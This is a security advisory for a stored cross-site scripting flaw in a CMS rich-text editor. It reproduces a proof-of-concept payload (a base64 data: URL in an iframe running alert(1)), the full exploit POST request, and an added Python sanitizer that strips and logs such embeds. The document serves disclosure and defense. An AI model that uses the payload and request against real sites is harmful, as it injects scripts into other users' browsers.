The text editor contains a Stored Cross-Site Scripting vulnerability
Issue date: 27-10-2020
Affects versions: 14.2
Security Issue ID
SECURITY-169
Affected Product Version(s)
14.0.0, 14.1.0, 14.2.2
Severity
high
Description
To exploit this vulnerability a payload was crafted with a base64 encoded string containing the
following value:
<svg/onload=alert(1)>
This payload was placed inside a data URL with a content type of "text/html". That URL was set as the
"src" attribute of an iframe element. Note that the "embed" element is also vulnerable.
The request below shows the payload highlighted:
POST /cms/?1-1.IBehaviorListener.0-root-tabs-panel~container-cards-2-panel-center-tabs-panel~container-cards-3-panel-editor-extension.workflow-menu-list-1-item-link&iframe&wicket-ajax=true&wicket-ajax-baseurl=%3F1%26amp%3Biframe HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------326343405939007604132881994108
Content-Length: 1185
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/cms/?1&iframe&path=/content/documents/developertrial/banners/banner1
Cookie: --snip--
Upgrade-Insecure-Requests: 1

-----------------------------326343405939007604132881994108
Content-Disposition: form-data; name="id2f_hf_0"

-----------------------------326343405939007604132881994108
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:extension.left:view:1:item:view:1:fieldContainer:item:value:widget"

Stored XSS
-----------------------------326343405939007604132881994108
Content-Disposition: form-data; name="cards:3:panel:editor:extension.editor:form:template:extension.left:view:2:item:view:2:fieldContainer:item:panel:editor"

<p><iframe src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></iframe></p>
--snip--
The response below shows it is accepted by the server with a 200-status code:
HTTP/1.1 200
Date: Mon, 08 Jun 2020 00:23:33 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store
Content-Type: text/xml;charset=UTF-8
Connection: close
Content-Length: 18885
--snip--
By default, authors are not able to publish pages to the site, but with this payload they are able to place client-side scripts in front of users of the CMS. Users with publish privileges are able to place client-side scripts in the frontend, which affects all visitors.
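The weakness described above is that the rich-text editor stores iframe (and embed) elements whose src is a data: URL, so the browser later renders an attacker-supplied HTML document in the page. The following is an added example of a server-side check a defender can run over stored rich text before it is saved or rendered; it is not the vendor's fix and not code from the product. It rebuilds the HTML while dropping embedding elements whose src/data attribute is not an allow-listed http(s) URL, and it decodes any data: URL it rejects so the finding can be logged or alerted on. The tag names object and frame, and the allow-list of schemes, are assumptions beyond what the advisory names; the sample inputs are constructed (the first one is the advisory's own field value).

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Elements that load active content through src/data. The advisory names iframe
# and embed; object and frame are added here as an assumption.
EMBEDDING_TAGS = {"iframe", "embed", "object", "frame"}
VOID_TAGS = {"embed"}                       # has no closing tag
ALLOWED_SCHEMES = ("https://", "http://")   # assumed allow-list for embeds

DATA_URL = re.compile(r"^\s*data:([^,]*),(.*)$", re.IGNORECASE | re.DOTALL)


def decode_data_url(url):
    """Decode a data: URL body so the embedded document can be inspected/logged.
    Returns None when the URL is not a data: URL."""
    m = DATA_URL.match(url)
    if m is None:
        return None
    meta, body = m.group(1), m.group(2)
    if "base64" in meta.lower():
        padded = body + "=" * (-len(body) % 4)      # tolerate missing padding
        try:
            return base64.b64decode(padded).decode("utf-8", "replace")
        except ValueError:                          # binascii.Error is a ValueError
            return ""
    return unquote(body)                            # percent-encoded body


class EmbedSanitizer(HTMLParser):
    """Rebuilds the HTML, dropping embedding elements whose src/data attribute
    is not an allow-listed URL, and recording what was dropped."""

    def __init__(self):
        # convert_charrefs=False keeps entities untouched: decoding &lt;script&gt;
        # in text and re-emitting it would turn harmless text into markup.
        super().__init__(convert_charrefs=False)
        self.out = []
        self.findings = []
        self._skip_tag = None   # name of the element currently being dropped
        self._skip_depth = 0

    def _is_blocked(self, tag, attrs):
        if tag not in EMBEDDING_TAGS:
            return False
        a = dict(attrs)
        src = (a.get("src") or a.get("data") or "").strip()
        if src.lower().startswith(ALLOWED_SCHEMES):
            return False
        self.findings.append({"tag": tag, "src": src, "decoded": decode_data_url(src)})
        return True

    def handle_starttag(self, tag, attrs):
        if self._skip_tag:
            if tag == self._skip_tag:
                self._skip_depth += 1
            return
        if self._is_blocked(tag, attrs):
            if tag not in VOID_TAGS:
                self._skip_tag, self._skip_depth = tag, 1
            return
        self.out.append(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):
        if self._skip_tag or self._is_blocked(tag, attrs):
            return
        self.out.append(self.get_starttag_text())

    def handle_endtag(self, tag):
        if self._skip_tag:
            if tag == self._skip_tag:
                self._skip_depth -= 1
                if self._skip_depth == 0:
                    self._skip_tag = None
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_tag:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._skip_tag:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._skip_tag:
            self.out.append(f"&#{name};")


def sanitize(html):
    """Return (clean_html, findings) for one stored rich-text field value."""
    p = EmbedSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out), p.findings


if __name__ == "__main__":
    # Constructed samples; the first is the field value from the advisory.
    samples = [
        '<p><iframe src="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMSk+"></iframe></p>',
        '<embed src="data:text/html,%3Cb%3Ehi%3C%2Fb%3E">',
        '<iframe src="https://example.com/video"></iframe> a &lt;b&gt; c',
    ]
    for s in samples:
        clean, findings = sanitize(s)
        print(repr(clean), findings)
```

The findings list is what a detection pipeline would ship to a SIEM: the rejected element, its raw src, and the decoded document (here the advisory's `<svg/onload=alert(1)>`), which is far more useful for triage than the base64 blob alone.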
Instructions
Customers are recommended to upgrade to the latest maintenance or minor releases as indicated above. This can be done by simply incrementing the version number of the parent POM for the implementation project.
Credit for discovering this issue
Thomas van Ruitenbeek